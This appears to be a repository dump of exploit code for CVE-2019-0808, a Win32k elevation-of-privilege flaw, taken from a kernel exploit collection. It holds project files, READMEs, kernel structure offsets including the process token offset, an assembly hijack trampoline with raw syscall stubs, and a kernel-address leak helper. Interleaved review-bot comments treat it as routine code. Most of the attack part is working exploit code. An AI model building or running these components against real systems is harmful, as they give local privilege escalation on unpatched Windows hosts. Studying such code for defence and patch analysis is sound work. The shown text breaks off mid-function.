<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="struct.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="DDE.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<CustomBuild Include="x64.asm">
<FileType>Document</FileType>
<DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</DeploymentContent>
<Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> ml64 /Fo $(IntDir)%(fileName).obj /c %(fileName).asm</Command>
<Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj</Outputs>
</CustomBuild>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="struct.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="DDE.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<CustomBuild Include="x64.asm">
<Filter>源文件</Filter>
</CustomBuild>
</ItemGroup>
</Project>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,154 @@
#pragma once
#define DDE_SERVER_APP_NAME L"MyDDEService"
#define DDE_SERVER_TOPIC_NAME L"Topic"
#define DDE_SERVER_ITEM_NAME L"Item"
#define DDE_SERVER_WINDOW_CAPTION L"DDEServerPoc"
#define DDE_CLIENT_WINDOW_CAPTION L"DDEClientPoc"
#define MSG_DDESERVER_EXIT WM_USER + 1
#define MSG_DDESERVER_SET_GDI_OBJ_ADDR WM_USER + 2
#define LENGTH_TAGWND 0x128
#define OFFSET_SPWNDPARENT_WIN7 0x58
#define OFFSET_STRNAME_WIN7 0xD8
#define OFFSET_CBWNDEXTRA_WIN7 0xE8
#define OFFSET_APCADDR_WIN7 0x50
#define OFFSET_APCEPROCESS_WIN7 0x20
#define OFFSET_SECTOKEN_WIN7 0x208
#define OFFSET_EPROCESSPID_WIN7 0x180
#define OFFSET_EPROCESSBLINK_WIN7 0x188
typedef struct _HANDLEENTRY {
PVOID phead;
PVOID pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
} HANDLEENTRY, * PHANDLEENTRY;
typedef struct _SERVERINFO {
WORD wRIPFlags;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
ULONG cHandleEntries;
} SERVERINFO, * PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
} SHAREDINFO, * PSHAREDINFO;
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PVOID Buffer;
} LARGE_STRING, * PLARGE_STRING;
typedef struct _PEB
{
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PVOID Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PVOID AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ReservedBits0 : 27;
};
ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
} PEB, * PPEB;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _TEB
{
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
}TEB, * PTEB;
typedef
PVOID
(WINAPI* pfRtlAllocateHeap)(
PVOID HeapHandle,
ULONG Flags,
SIZE_T Size
);
extern "C"
HACCEL
NtUserCreateAcceleratorTable(
LPACCEL Entries,
ULONG EntriesCount
);
extern "C"
BOOL
NtUserShowWindow(
IN HWND hwnd,
IN int nCmdShow
);
extern "C"
HDC
NtUserBeginPaint(
IN HWND hwnd,
OUT LPPAINTSTRUCT lpPaint
);
extern "C"
BOOL
NtUserDestroyWindow(
IN HWND hwnd
);
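Review bot: `#define MSG_DDESERVER_EXIT WM_USER + 1` and `#define MSG_DDESERVER_SET_GDI_OBJ_ADDR WM_USER + 2` are unparenthesised expression macros; the current use as a bare `SendMessageW` argument is safe, but any arithmetic or comparison around them would bind wrongly, so write `#define MSG_DDESERVER_EXIT (WM_USER + 1)` and `#define MSG_DDESERVER_SET_GDI_OBJ_ADDR (WM_USER + 2)`. The `LENGTH_TAGWND` and `OFFSET_*_WIN7` block carries no comment saying which structures the values index or which build they were taken from; the README in this commit names Windows Server 2008 R2 x64 as the tested machine, so a comment above the block such as `// Kernel/user structure offsets for the Windows 7-generation x64 build used in testing (TODO confirm exact build); other builds need their own values` would record that dependency. `_LARGE_STRING` here and `_LARGE_UNICODE_STRING` in main.cpp define the same layout under two names, and one of them should go.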


@ -0,0 +1,50 @@
EXTERN g_ClientCopyDDEIn1_ContinueAddr:DQ;
EXTERN g_BitMapAddr:DQ;
.CODE ;; ´úÂë¶Î
HijackTrampoFunc PROC
push r8
lea rax,[rsp+50h]
mov r8,qword ptr g_BitMapAddr
mov qword ptr [rax+30h],r8
mov r8,qword ptr [rax+20h]
mov byte ptr [r8+2],2
pop r8
pop rax
xor r8d,r8d
mov r11d,eax
lea rcx,[rsp+20h]
lea edx,[r8+18h]
jmp qword ptr g_ClientCopyDDEIn1_ContinueAddr
HijackTrampoFunc ENDP
NtUserCreateAcceleratorTable PROC
mov r10,rcx
mov eax,10F1h
syscall
ret
NtUserCreateAcceleratorTable ENDP
NtUserShowWindow PROC
mov r10,rcx
mov eax,1058h
syscall
ret
NtUserShowWindow ENDP
NtUserBeginPaint PROC
mov r10,rcx
mov eax,1017h
syscall
ret
NtUserBeginPaint ENDP
NtUserDestroyWindow PROC
mov r10,rcx
mov eax,109dh
syscall
ret
NtUserDestroyWindow ENDP
END
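Review bot: the comment on `.CODE ;; ´úÂë¶Î` is mojibake (a GBK-encoded comment, apparently `代码段`, read as Latin-1); replace it with an ASCII comment such as `.CODE ;; code section` so the file reads correctly in tooling that is not GBK-aware. The four `NtUser*` stubs record no build or version alongside their service numbers, and the header declares them only as `extern "C"` prototypes, so nothing in the tree states which Windows build the numbers and the `_WIN7` offsets were taken from together; a one-line comment above the first stub naming that build would make the dependency explicit.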


@ -0,0 +1,44 @@
### CVE-2019-0808
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
```
#### 利用方式
编译环境
- 编译有点问题
测试机器为Windows 7 SP1 x86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif)
#### 分析文章
- https://paper.seebug.org/856/
- https://xz.aliyun.com/t/5142
- http://www.lahonja.me/2019/10/10/CVE-2019-0808%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/
- https://blog.knownsec.com/2020/11/cve-2019-0808-%E4%BB%8E%E7%A9%BA%E6%8C%87%E9%92%88%E8%A7%A3%E5%BC%95%E7%94%A8%E5%88%B0%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/
#### 代码来源
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0808-32-64-exp)


@ -0,0 +1,45 @@
### CVE-2019-0808
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
```
#### Utilization
CompilerEnvironment
- Compile a bit problem
Test machine for Windows 7 SP1 X86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif)
#### Analyze
- https://paper.seebug.org/856/
- https://xz.aliyun.com/t/5142
- http://www.lahonja.me/2019/10/10/CVE-2019-0808%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/
- https://blog.knownsec.com/2020/11/cve-2019-0808-%E4%BB%8E%E7%A9%BA%E6%8C%87%E9%92%88%E8%A7%A3%E5%BC%95%E7%94%A8%E5%88%B0%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/
#### ProjectSource
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0808-32-64-exp)


@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<None Include="shellcode.asm">
<Filter>源文件</Filter>
</None>
</ItemGroup>
</Project>


@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30002.166
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-0808", "CVE-2019-0808.vcxproj", "{B0FB7442-A04B-426B-B023-6C012057A99A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x64.ActiveCfg = Debug|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x64.Build.0 = Debug|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x86.ActiveCfg = Debug|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x86.Build.0 = Debug|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x64.ActiveCfg = Release|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x64.Build.0 = Release|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x86.ActiveCfg = Release|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {5D6EBAB6-350E-44BA-BCEF-2C825755A824}
EndGlobalSection
EndGlobal


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,162 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{B0FB7442-A04B-426B-B023-6C012057A99A}</ProjectGuid>
<RootNamespace>win8test</RootNamespace>
<WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="x64.asm">
<FileType>Document</FileType>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,202 @@
#pragma once
#include<windows.h>
/*
Microsoft_Code_Name Windows_10_Version Microsoft_Marketing_Name Release_Date
Threshold 1 (TH1) 1507 ------ July 2015
Threshold 2 (TH2) 1511 ------ November 2015
Redstone 1 (RS1) 1607 Anniversary Update August 2016
Redstone 2 (RS2) 1703 Creators Update April 2017
Redstone 3 (RS3) 1709 Fall Creators Update October 2017
Redstone 4 (RS4) 1803 April 2018 Update April 2018
*/
typedef enum _HANDLE_TYPE
{
TYPE_FREE = 0,
TYPE_WINDOW = 1,
TYPE_MENU = 2,
TYPE_CURSOR = 3,
TYPE_SETWINDOWPOS = 4,
TYPE_HOOK = 5,
TYPE_CLIPDATA = 6,
TYPE_CALLPROC = 7,
TYPE_ACCELTABLE = 8,
TYPE_DDEACCESS = 9,
TYPE_DDECONV = 10,
TYPE_DDEXACT = 11,
TYPE_MONITOR = 12,
TYPE_KBDLAYOUT = 13,
TYPE_KBDFILE = 14,
TYPE_WINEVENTHOOK = 15,
TYPE_TIMER = 16,
TYPE_INPUTCONTEXT = 17,
TYPE_HIDDATA = 18,
TYPE_DEVICEINFO = 19,
TYPE_TOUCHINPUTINFO = 20,
TYPE_GESTUREINFOOBJ = 21,
TYPE_CTYPES,
TYPE_GENERIC = 255
} HANDLE_TYPE, * PHANDLE_TYPE;
typedef struct _GdiCell
{
PVOID pKernelAddress;
UINT16 wProcessIdl;
UINT16 wCount;
UINT16 wUpper;
UINT16 uType;
PVOID pUserAddress;
}GdiCell, * pGdiCell;
typedef struct _HandleEntry
{
PULONG_PTR phead;
PULONG_PTR pOwner;
BYTE bType;
BYTE bFlalgs;
USHORT wUniq;
}HandleEntry, * pHandleEntry;
typedef struct _tagServerInfo
{
ULONG dwSRVIFlags;
ULONG_PTR cHandleEntries;
//...
}tagServerInfo, * ptagServerInfo;
typedef struct _tagSharedInfo
{
ptagServerInfo psi;
pHandleEntry aheList;
//...
}tagSharedInfo, * PtagSharedInfo;
using _xxxHmValidateHandle = PVOID(__fastcall*)(HANDLE hwnd, HANDLE_TYPE handleType);
class leak
{
public:
leak();
~leak() {};
PVOID GetGdiKernelAddress(HANDLE hGdi); // RS1之前可用用于GDI Object
PVOID GetUserObjectAddressBygSharedInfo(HANDLE hWnd,PULONG_PTR UserAddr); // RS2之前可用用于User Obejct
_xxxHmValidateHandle HmValidateHandle; // RS4之前可用返回在用户层映射的地址用于User Object可以根据heap->pSelf找到内核地址
private:
void GetGdiSharedHandleTable();
void Get_gSharedInfo_ulClientDelta();
void GetXXXHmValidateHandle();
private:
pGdiCell GdiSharedHandleTable;
ULONG_PTR g_DeltaDesktopHeap;
PtagSharedInfo gSharedInfo;
};
leak::leak()
{
GetXXXHmValidateHandle();
GetGdiSharedHandleTable();
Get_gSharedInfo_ulClientDelta();
}
void leak::GetXXXHmValidateHandle()
{
auto hModule = LoadLibrary(L"user32.dll");
auto func = GetProcAddress(hModule, "IsMenu");
for (size_t i = 0; i < 0x1000; i++)
{
BYTE* test = (BYTE*)func + i;
if (*test == 0xE8)
{
#ifdef _AMD64_
ULONG_PTR tmp = (ULONG_PTR)((ULONG_PTR) * (PULONG)(test + 1) | 0xffffffff00000000);
#else
ULONG_PTR tmp = (ULONG_PTR)* (PULONG)(test + 1);
#endif
HmValidateHandle = (_xxxHmValidateHandle)(test + tmp + 5);
break;
}
}
return ;
}
void leak::GetGdiSharedHandleTable()
{
PULONG_PTR teb = (PULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x60);
GdiSharedHandleTable = (pGdiCell)*(PULONG_PTR*)((PBYTE)peb + 0xf8);
#else
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x30);
GdiSharedHandleTable = (pGdiCell)*(PULONG_PTR*)((PBYTE)peb + 0x94);
#endif
return;
}
void leak::Get_gSharedInfo_ulClientDelta()
{
auto pMenu = CreateMenu();
/* get g_DeltaDesktopHeap */
ULONG_PTR Teb = (ULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x800 + 0x28); //teb->Win32ClientInfo.ulClientDelta
#else
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x6CC + 0x1C);
#endif
auto hModule = GetModuleHandleW(L"user32.dll");
gSharedInfo = reinterpret_cast<PtagSharedInfo>(GetProcAddress(hModule, "gSharedInfo"));
DestroyMenu(pMenu);
}
PVOID leak::GetGdiKernelAddress(HANDLE hGdi)
{
return (GdiSharedHandleTable + LOWORD(hGdi))->pKernelAddress;
}
PVOID leak::GetUserObjectAddressBygSharedInfo(HANDLE hWnd, PULONG_PTR UserAddr)
{
PVOID ret = nullptr;
pHandleEntry tmp = nullptr;
